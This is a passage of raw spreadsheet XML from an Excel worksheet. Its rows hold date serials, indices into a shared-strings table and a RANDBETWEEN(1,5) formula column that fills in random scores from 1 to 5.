        <v>24073</v>
      </c>
      <c r="F26488">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26489" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26489" s="1">
        <v>42919.033356481479</v>
      </c>
      <c r="C26489" t="s">
        <v>41</v>
      </c>
      <c r="E26489" t="s">
        <v>24074</v>
      </c>
      <c r="F26489">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26490" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26490" s="1">
        <v>42918.324999999997</v>
      </c>
      <c r="C26490" t="s">
        <v>63</v>
      </c>
      <c r="E26490" s="2" t="s">
        <v>24075</v>
      </c>
      <c r="F26490">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26491" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26491" s="1">
        <v>42917.509965277779</v>
      </c>
      <c r="C26491" t="s">
        <v>10</v>
      </c>
      <c r="D26491" t="s">
        <v>6</v>
      </c>
      <c r="E26491" t="s">
        <v>24076</v>
      </c>
      <c r="F26491">
        <f t="shared" ca="1" si="413"/>
        <v>5</v>
      </c>
    </row>
    <row r="26492" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26492" s="1">
        <v>42917.433576388888</v>
      </c>
      <c r="C26492" t="s">
        <v>10</v>
      </c>
      <c r="D26492" t="s">
        <v>56</v>
      </c>
      <c r="E26492" t="s">
        <v>24077</v>
      </c>
      <c r="F26492">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26493" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A26493" s="1">
        <v>42917.258611111109</v>
      </c>
      <c r="C26493" t="s">
        <v>10</v>
      </c>
      <c r="D26493" t="s">
        <v>6</v>
      </c>
      <c r="E26493" s="2" t="s">
        <v>24078</v>
      </c>
      <c r="F26493">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26494" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26494" s="1">
        <v>42916.938275462962</v>
      </c>
      <c r="C26494" t="s">
        <v>10</v>
      </c>
      <c r="D26494" t="s">
        <v>6</v>
      </c>
      <c r="E26494" s="2" t="s">
        <v>24079</v>
      </c>
      <c r="F26494">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26495" s="1">
        <v>42916.862939814811</v>
      </c>
      <c r="C26495" t="s">
        <v>10</v>
      </c>
      <c r="D26495" t="s">
        <v>494</v>
      </c>
      <c r="E26495" t="s">
        <v>24080</v>
      </c>
      <c r="F26495">
        <f t="shared" ca="1" si="413"/>
        <v>3</v>
      </c>
    </row>
    <row r="26496" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26496" s="1">
        <v>42916.7109375</v>
      </c>
      <c r="C26496" t="s">
        <v>10</v>
      </c>
      <c r="D26496" t="s">
        <v>20</v>
      </c>
      <c r="E26496" t="s">
        <v>24081</v>
      </c>
      <c r="F26496">
        <f t="shared" ca="1" si="413"/>
        <v>2</v>
      </c>
    </row>
    <row r="26497" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A26497" s="1">
        <v>42916.703206018516</v>
      </c>
      <c r="C26497" t="s">
        <v>10</v>
      </c>
      <c r="D26497" t="s">
        <v>20</v>
      </c>
      <c r="E26497" s="2" t="s">
        <v>24001</v>
      </c>
      <c r="F26497">
        <f t="shared" ca="1" si="413"/>
        <v>1</v>
      </c>
    </row>
    <row r="26498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26498" s="1">
        <v>42916.697453703702</v>
      </c>
      <c r="C26498" t="s">
        <v>10</v>
      </c>
      <c r="D26498" t="s">
        <v>229</v>
      </c>
      <c r="E26498" t="s">
        <v>24082</v>
      </c>
      <c r="F26498">
        <f t="shared" ref="F26498:F26561" ca="1" si="414">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="26499" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26499" s="1">
        <v>42916.682129629633</v>
      </c>
      <c r="C26499" t="s">
        <v>10</v>
      </c>
      <c r="D26499" t="s">
        <v>6</v>
      </c>
      <c r="E26499" t="s">
        <v>24083</v>
      </c>
      <c r="F26499">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26500" s="1">
        <v>42916.630277777775</v>
      </c>
      <c r="C26500" t="s">
        <v>10</v>
      </c>
      <c r="D26500" t="s">
        <v>151</v>
      </c>
      <c r="E26500" t="s">
        <v>24084</v>
      </c>
      <c r="F26500">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26501" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A26501" s="1">
        <v>42916.628530092596</v>
      </c>
      <c r="C26501" t="s">
        <v>10</v>
      </c>
      <c r="D26501" t="s">
        <v>89</v>
      </c>
      <c r="E26501" s="2" t="s">
        <v>24085</v>
      </c>
      <c r="F26501">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26502" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26502" s="1">
        <v>42916.563738425924</v>
      </c>
      <c r="C26502" t="s">
        <v>10</v>
      </c>
      <c r="D26502" t="s">
        <v>6</v>
      </c>
      <c r="E26502" s="2" t="s">
        <v>24086</v>
      </c>
      <c r="F26502">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26503" s="1">
        <v>42916.561215277776</v>
      </c>
      <c r="C26503" t="s">
        <v>10</v>
      </c>
      <c r="D26503" t="s">
        <v>6</v>
      </c>
      <c r="E26503" t="s">
        <v>24087</v>
      </c>
      <c r="F26503">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26504" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26504" s="1">
        <v>42916.535775462966</v>
      </c>
      <c r="C26504" t="s">
        <v>6</v>
      </c>
      <c r="D26504" t="s">
        <v>114</v>
      </c>
      <c r="E26504" t="s">
        <v>24088</v>
      </c>
      <c r="F26504">
        <f t="shared" ca="1" si="414"/>
        <v>1</v>
      </c>
    </row>
    <row r="26505" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26505" s="1">
        <v>42916.516400462962</v>
      </c>
      <c r="C26505" t="s">
        <v>10</v>
      </c>
      <c r="D26505" t="s">
        <v>36</v>
      </c>
      <c r="E26505" t="s">
        <v>24089</v>
      </c>
      <c r="F26505">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26506" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26506" s="1">
        <v>42916.458749999998</v>
      </c>
      <c r="C26506" t="s">
        <v>535</v>
      </c>
      <c r="E26506" s="2" t="s">
        <v>24090</v>
      </c>
      <c r="F26506">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26507" s="1">
        <v>42916.424050925925</v>
      </c>
      <c r="C26507" t="s">
        <v>10</v>
      </c>
      <c r="D26507" t="s">
        <v>56</v>
      </c>
      <c r="E26507" t="s">
        <v>24091</v>
      </c>
      <c r="F26507">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26508" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26508" s="1">
        <v>42916.419432870367</v>
      </c>
      <c r="C26508" t="s">
        <v>314</v>
      </c>
      <c r="E26508" t="s">
        <v>24092</v>
      </c>
      <c r="F26508">
        <f t="shared" ca="1" si="414"/>
        <v>1</v>
      </c>
    </row>
    <row r="26509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26509" s="1">
        <v>42916.405231481483</v>
      </c>
      <c r="C26509" t="s">
        <v>48</v>
      </c>
      <c r="E26509" t="s">
        <v>24093</v>
      </c>
      <c r="F26509">
        <f t="shared" ca="1" si="414"/>
        <v>4</v>
      </c>
    </row>
    <row r="26510" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26510" s="1">
        <v>42916.3596412037</v>
      </c>
      <c r="C26510" t="s">
        <v>65</v>
      </c>
      <c r="E26510" s="2" t="s">
        <v>24094</v>
      </c>
      <c r="F26510">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26511" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26511" s="1">
        <v>42916.355543981481</v>
      </c>
      <c r="C26511" t="s">
        <v>10</v>
      </c>
      <c r="D26511" t="s">
        <v>192</v>
      </c>
      <c r="E26511" s="2" t="s">
        <v>24095</v>
      </c>
      <c r="F26511">
        <f t="shared" ca="1" si="414"/>
        <v>4</v>
      </c>
    </row>
    <row r="26512" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26512" s="1">
        <v>42916.342604166668</v>
      </c>
      <c r="C26512" t="s">
        <v>10</v>
      </c>
      <c r="D26512" t="s">
        <v>33</v>
      </c>
      <c r="E26512" t="s">
        <v>24096</v>
      </c>
      <c r="F26512">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26513" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26513" s="1">
        <v>42916.281736111108</v>
      </c>
      <c r="C26513" t="s">
        <v>41</v>
      </c>
      <c r="E26513" t="s">
        <v>9512</v>
      </c>
      <c r="F26513">
        <f t="shared" ca="1" si="414"/>
        <v>4</v>
      </c>
    </row>
    <row r="26514" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26514" s="1">
        <v>42916.27685185185</v>
      </c>
      <c r="C26514" t="s">
        <v>103</v>
      </c>
      <c r="E26514" s="2" t="s">
        <v>24097</v>
      </c>
      <c r="F26514">
        <f t="shared" ca="1" si="414"/>
        <v>1</v>
      </c>
    </row>
    <row r="26515" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26515" s="1">
        <v>42916.227326388886</v>
      </c>
      <c r="C26515" t="s">
        <v>71</v>
      </c>
      <c r="E26515" s="2" t="s">
        <v>24098</v>
      </c>
      <c r="F26515">
        <f t="shared" ca="1" si="414"/>
        <v>1</v>
      </c>
    </row>
    <row r="26516" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26516" s="1">
        <v>42916.216527777775</v>
      </c>
      <c r="C26516" t="s">
        <v>253</v>
      </c>
      <c r="E26516" s="2" t="s">
        <v>24099</v>
      </c>
      <c r="F26516">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26517" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26517" s="1">
        <v>42916.188738425924</v>
      </c>
      <c r="C26517" t="s">
        <v>103</v>
      </c>
      <c r="E26517" s="2" t="s">
        <v>24100</v>
      </c>
      <c r="F26517">
        <f t="shared" ca="1" si="414"/>
        <v>4</v>
      </c>
    </row>
    <row r="26518" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A26518" s="1">
        <v>42916.077060185184</v>
      </c>
      <c r="C26518" t="s">
        <v>140</v>
      </c>
      <c r="D26518" t="s">
        <v>141</v>
      </c>
      <c r="E26518" s="2" t="s">
        <v>24101</v>
      </c>
      <c r="F26518">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26519" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26519" s="1">
        <v>42915.938564814816</v>
      </c>
      <c r="C26519" t="s">
        <v>144</v>
      </c>
      <c r="E26519" s="2" t="s">
        <v>24102</v>
      </c>
      <c r="F26519">
        <f t="shared" ca="1" si="414"/>
        <v>4</v>
      </c>
    </row>
    <row r="26520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26520" s="1">
        <v>42915.907685185186</v>
      </c>
      <c r="C26520" t="s">
        <v>140</v>
      </c>
      <c r="D26520" t="s">
        <v>847</v>
      </c>
      <c r="E26520" t="s">
        <v>24103</v>
      </c>
      <c r="F26520">
        <f t="shared" ca="1" si="414"/>
        <v>1</v>
      </c>
    </row>
    <row r="26521" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26521" s="1">
        <v>42915.792986111112</v>
      </c>
      <c r="C26521" t="s">
        <v>260</v>
      </c>
      <c r="E26521" t="s">
        <v>24104</v>
      </c>
      <c r="F26521">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26522" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26522" s="1">
        <v>42915.768425925926</v>
      </c>
      <c r="C26522" t="s">
        <v>10</v>
      </c>
      <c r="D26522" t="s">
        <v>46</v>
      </c>
      <c r="E26522" t="s">
        <v>24105</v>
      </c>
      <c r="F26522">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26523" s="1">
        <v>42915.767800925925</v>
      </c>
      <c r="C26523" t="s">
        <v>253</v>
      </c>
      <c r="E26523" t="s">
        <v>24106</v>
      </c>
      <c r="F26523">
        <f t="shared" ca="1" si="414"/>
        <v>1</v>
      </c>
    </row>
    <row r="26524" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26524" s="1">
        <v>42915.74559027778</v>
      </c>
      <c r="C26524" t="s">
        <v>10</v>
      </c>
      <c r="D26524" t="s">
        <v>336</v>
      </c>
      <c r="E26524" t="s">
        <v>24107</v>
      </c>
      <c r="F26524">
        <f t="shared" ca="1" si="414"/>
        <v>4</v>
      </c>
    </row>
    <row r="26525" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26525" s="1">
        <v>42915.723298611112</v>
      </c>
      <c r="C26525" t="s">
        <v>41</v>
      </c>
      <c r="E26525" s="2" t="s">
        <v>24108</v>
      </c>
      <c r="F26525">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26526" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26526" s="1">
        <v>42915.70045138889</v>
      </c>
      <c r="C26526" t="s">
        <v>10</v>
      </c>
      <c r="D26526" t="s">
        <v>494</v>
      </c>
      <c r="E26526" t="s">
        <v>24109</v>
      </c>
      <c r="F26526">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26527" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26527" s="1">
        <v>42915.668090277781</v>
      </c>
      <c r="C26527" t="s">
        <v>10</v>
      </c>
      <c r="D26527" t="s">
        <v>192</v>
      </c>
      <c r="E26527" t="s">
        <v>24110</v>
      </c>
      <c r="F26527">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26528" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26528" s="1">
        <v>42915.662488425929</v>
      </c>
      <c r="C26528" t="s">
        <v>6</v>
      </c>
      <c r="D26528" t="s">
        <v>194</v>
      </c>
      <c r="E26528" s="2" t="s">
        <v>24111</v>
      </c>
      <c r="F26528">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26529" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26529" s="1">
        <v>42915.652291666665</v>
      </c>
      <c r="C26529" t="s">
        <v>6</v>
      </c>
      <c r="D26529" t="s">
        <v>25</v>
      </c>
      <c r="E26529" t="s">
        <v>24112</v>
      </c>
      <c r="F26529">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26530" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26530" s="1">
        <v>42915.650613425925</v>
      </c>
      <c r="C26530" t="s">
        <v>10</v>
      </c>
      <c r="D26530" t="s">
        <v>271</v>
      </c>
      <c r="E26530" t="s">
        <v>24113</v>
      </c>
      <c r="F26530">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26531" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26531" s="1">
        <v>42915.613206018519</v>
      </c>
      <c r="C26531" t="s">
        <v>6</v>
      </c>
      <c r="D26531" t="s">
        <v>114</v>
      </c>
      <c r="E26531" s="2" t="s">
        <v>24114</v>
      </c>
      <c r="F26531">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26532" s="1">
        <v>42915.59270833333</v>
      </c>
      <c r="C26532" t="s">
        <v>10</v>
      </c>
      <c r="D26532" t="s">
        <v>36</v>
      </c>
      <c r="E26532" t="s">
        <v>24115</v>
      </c>
      <c r="F26532">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26533" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26533" s="1">
        <v>42915.568495370368</v>
      </c>
      <c r="C26533" t="s">
        <v>140</v>
      </c>
      <c r="D26533" t="s">
        <v>141</v>
      </c>
      <c r="E26533" s="2" t="s">
        <v>24116</v>
      </c>
      <c r="F26533">
        <f t="shared" ca="1" si="414"/>
        <v>1</v>
      </c>
    </row>
    <row r="26534" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26534" s="1">
        <v>42915.553240740737</v>
      </c>
      <c r="C26534" t="s">
        <v>6</v>
      </c>
      <c r="D26534" t="s">
        <v>25</v>
      </c>
      <c r="E26534" s="2" t="s">
        <v>24117</v>
      </c>
      <c r="F26534">
        <f t="shared" ca="1" si="414"/>
        <v>4</v>
      </c>
    </row>
    <row r="26535" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26535" s="1">
        <v>42915.514108796298</v>
      </c>
      <c r="C26535" t="s">
        <v>3027</v>
      </c>
      <c r="E26535" s="2" t="s">
        <v>24118</v>
      </c>
      <c r="F26535">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26536" s="1">
        <v>42915.470335648148</v>
      </c>
      <c r="C26536" t="s">
        <v>6</v>
      </c>
      <c r="D26536" t="s">
        <v>25</v>
      </c>
      <c r="E26536" t="s">
        <v>24119</v>
      </c>
      <c r="F26536">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26537" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26537" s="1">
        <v>42915.409918981481</v>
      </c>
      <c r="C26537" t="s">
        <v>65</v>
      </c>
      <c r="E26537" s="2" t="s">
        <v>24120</v>
      </c>
      <c r="F26537">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26538" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26538" s="1">
        <v>42915.409733796296</v>
      </c>
      <c r="C26538" t="s">
        <v>10</v>
      </c>
      <c r="D26538" t="s">
        <v>244</v>
      </c>
      <c r="E26538" t="s">
        <v>24121</v>
      </c>
      <c r="F26538">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26539" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26539" s="1">
        <v>42915.357083333336</v>
      </c>
      <c r="C26539" t="s">
        <v>10</v>
      </c>
      <c r="D26539" t="s">
        <v>271</v>
      </c>
      <c r="E26539" t="s">
        <v>24122</v>
      </c>
      <c r="F26539">
        <f t="shared" ca="1" si="414"/>
        <v>1</v>
      </c>
    </row>
    <row r="26540" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26540" s="1">
        <v>42915.294178240743</v>
      </c>
      <c r="C26540" t="s">
        <v>41</v>
      </c>
      <c r="E26540" s="2" t="s">
        <v>24123</v>
      </c>
      <c r="F26540">
        <f t="shared" ca="1" si="414"/>
        <v>4</v>
      </c>
    </row>
    <row r="26541" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26541" s="1">
        <v>42915.289421296293</v>
      </c>
      <c r="C26541" t="s">
        <v>69</v>
      </c>
      <c r="E26541" t="s">
        <v>24124</v>
      </c>
      <c r="F26541">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26542" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26542" s="1">
        <v>42915.275972222225</v>
      </c>
      <c r="C26542" t="s">
        <v>48</v>
      </c>
      <c r="E26542" t="s">
        <v>24125</v>
      </c>
      <c r="F26542">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26543" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26543" s="1">
        <v>42915.197500000002</v>
      </c>
      <c r="C26543" t="s">
        <v>134</v>
      </c>
      <c r="E26543" s="2" t="s">
        <v>24126</v>
      </c>
      <c r="F26543">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26544" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26544" s="1">
        <v>42915.184201388889</v>
      </c>
      <c r="C26544" t="s">
        <v>71</v>
      </c>
      <c r="E26544" s="2" t="s">
        <v>24127</v>
      </c>
      <c r="F26544">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26545" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26545" s="1">
        <v>42915.175937499997</v>
      </c>
      <c r="C26545" t="s">
        <v>48</v>
      </c>
      <c r="E26545" s="2" t="s">
        <v>24128</v>
      </c>
      <c r="F26545">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26546" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26546" s="1">
        <v>42915.172210648147</v>
      </c>
      <c r="C26546" t="s">
        <v>71</v>
      </c>
      <c r="E26546" s="2" t="s">
        <v>24129</v>
      </c>
      <c r="F26546">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26547" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26547" s="1">
        <v>42915.16574074074</v>
      </c>
      <c r="C26547" t="s">
        <v>71</v>
      </c>
      <c r="E26547" t="s">
        <v>24130</v>
      </c>
      <c r="F26547">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26548" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A26548" s="1">
        <v>42915.163090277776</v>
      </c>
      <c r="C26548" t="s">
        <v>41</v>
      </c>
      <c r="E26548" s="2" t="s">
        <v>24131</v>
      </c>
      <c r="F26548">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26549" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26549" s="1">
        <v>42915.151909722219</v>
      </c>
      <c r="C26549" t="s">
        <v>48</v>
      </c>
      <c r="E26549" t="s">
        <v>24132</v>
      </c>
      <c r="F26549">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26550" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26550" s="1">
        <v>42915.142557870371</v>
      </c>
      <c r="C26550" t="s">
        <v>408</v>
      </c>
      <c r="F26550">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26551" s="1">
        <v>42915.132928240739</v>
      </c>
      <c r="C26551" t="s">
        <v>124</v>
      </c>
      <c r="E26551" t="s">
        <v>24133</v>
      </c>
      <c r="F26551">
        <f t="shared" ca="1" si="414"/>
        <v>4</v>
      </c>
    </row>
    <row r="26552" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26552" s="1">
        <v>42915.001562500001</v>
      </c>
      <c r="C26552" t="s">
        <v>140</v>
      </c>
      <c r="D26552" t="s">
        <v>141</v>
      </c>
      <c r="E26552" t="s">
        <v>24134</v>
      </c>
      <c r="F26552">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26553" s="1">
        <v>42915.001064814816</v>
      </c>
      <c r="C26553" t="s">
        <v>140</v>
      </c>
      <c r="D26553" t="s">
        <v>141</v>
      </c>
      <c r="E26553" t="s">
        <v>24135</v>
      </c>
      <c r="F26553">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26554" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26554" s="1">
        <v>42914.929548611108</v>
      </c>
      <c r="C26554" t="s">
        <v>140</v>
      </c>
      <c r="D26554" t="s">
        <v>234</v>
      </c>
      <c r="E26554" s="2" t="s">
        <v>24136</v>
      </c>
      <c r="F26554">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26555" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26555" s="1">
        <v>42914.786504629628</v>
      </c>
      <c r="C26555" t="s">
        <v>6</v>
      </c>
      <c r="D26555" t="s">
        <v>25</v>
      </c>
      <c r="E26555" t="s">
        <v>24137</v>
      </c>
      <c r="F26555">
        <f t="shared" ca="1" si="414"/>
        <v>4</v>
      </c>
    </row>
    <row r="26556" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26556" s="1">
        <v>42914.76829861111</v>
      </c>
      <c r="C26556" t="s">
        <v>6</v>
      </c>
      <c r="D26556" t="s">
        <v>25</v>
      </c>
      <c r="E26556" t="s">
        <v>811</v>
      </c>
      <c r="F26556">
        <f t="shared" ca="1" si="414"/>
        <v>5</v>
      </c>
    </row>
    <row r="26557" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26557" s="1">
        <v>42914.765752314815</v>
      </c>
      <c r="C26557" t="s">
        <v>10</v>
      </c>
      <c r="E26557" t="s">
        <v>24138</v>
      </c>
      <c r="F26557">
        <f t="shared" ca="1" si="414"/>
        <v>3</v>
      </c>
    </row>
    <row r="26558" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26558" s="1">
        <v>42914.738518518519</v>
      </c>
      <c r="C26558" t="s">
        <v>10</v>
      </c>
      <c r="D26558" t="s">
        <v>46</v>
      </c>
      <c r="E26558" t="s">
        <v>24139</v>
      </c>
      <c r="F26558">
        <f t="shared" ca="1" si="414"/>
        <v>1</v>
      </c>
    </row>
    <row r="26559" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26559" s="1">
        <v>42914.70103009259</v>
      </c>
      <c r="C26559" t="s">
        <v>10</v>
      </c>
      <c r="D26559" t="s">
        <v>52</v>
      </c>
      <c r="E26559" t="s">
        <v>24140</v>
      </c>
      <c r="F26559">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26560" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26560" s="1">
        <v>42914.698645833334</v>
      </c>
      <c r="C26560" t="s">
        <v>10</v>
      </c>
      <c r="D26560" t="s">
        <v>46</v>
      </c>
      <c r="E26560" t="s">
        <v>24141</v>
      </c>
      <c r="F26560">
        <f t="shared" ca="1" si="414"/>
        <v>2</v>
      </c>
    </row>
    <row r="26561" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26561" s="1">
        <v>42914.68891203704</v>
      </c>
      <c r="C26561" t="s">
        <v>10</v>
      </c>
      <c r="D26561" t="s">
        <v>80</v>
      </c>
      <c r="E26561" t="s">
        <v>24142</v>
      </c>
      <c r="F26561">
        <f t="shared" ca="1" si="414"/>
        <v>1</v>
      </c>
    </row>
    <row r="26562" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26562" s="1">
        <v>42914.680891203701</v>
      </c>
      <c r="C26562" t="s">
        <v>10</v>
      </c>
      <c r="D26562" t="s">
        <v>251</v>
      </c>
      <c r="E26562" t="s">
        <v>24143</v>
      </c>
      <c r="F26562">
        <f t="shared" ref="F26562:F26625" ca="1" si="415">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="26563" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26563" s="1">
        <v>42914.663715277777</v>
      </c>
      <c r="C26563" t="s">
        <v>10</v>
      </c>
      <c r="D26563" t="s">
        <v>17</v>
      </c>
      <c r="E26563" t="s">
        <v>24144</v>
      </c>
      <c r="F26563">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26564" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26564" s="1">
        <v>42914.657060185185</v>
      </c>
      <c r="C26564" t="s">
        <v>10</v>
      </c>
      <c r="D26564" t="s">
        <v>89</v>
      </c>
      <c r="E26564" s="2" t="s">
        <v>24145</v>
      </c>
      <c r="F26564">
        <f t="shared" ca="1" si="415"/>
        <v>4</v>
      </c>
    </row>
    <row r="26565" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26565" s="1">
        <v>42914.642222222225</v>
      </c>
      <c r="C26565" t="s">
        <v>10</v>
      </c>
      <c r="D26565" t="s">
        <v>52</v>
      </c>
      <c r="E26565" t="s">
        <v>24146</v>
      </c>
      <c r="F26565">
        <f t="shared" ca="1" si="415"/>
        <v>3</v>
      </c>
    </row>
    <row r="26566" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26566" s="1">
        <v>42914.604791666665</v>
      </c>
      <c r="C26566" t="s">
        <v>10</v>
      </c>
      <c r="D26566" t="s">
        <v>494</v>
      </c>
      <c r="E26566" t="s">
        <v>24147</v>
      </c>
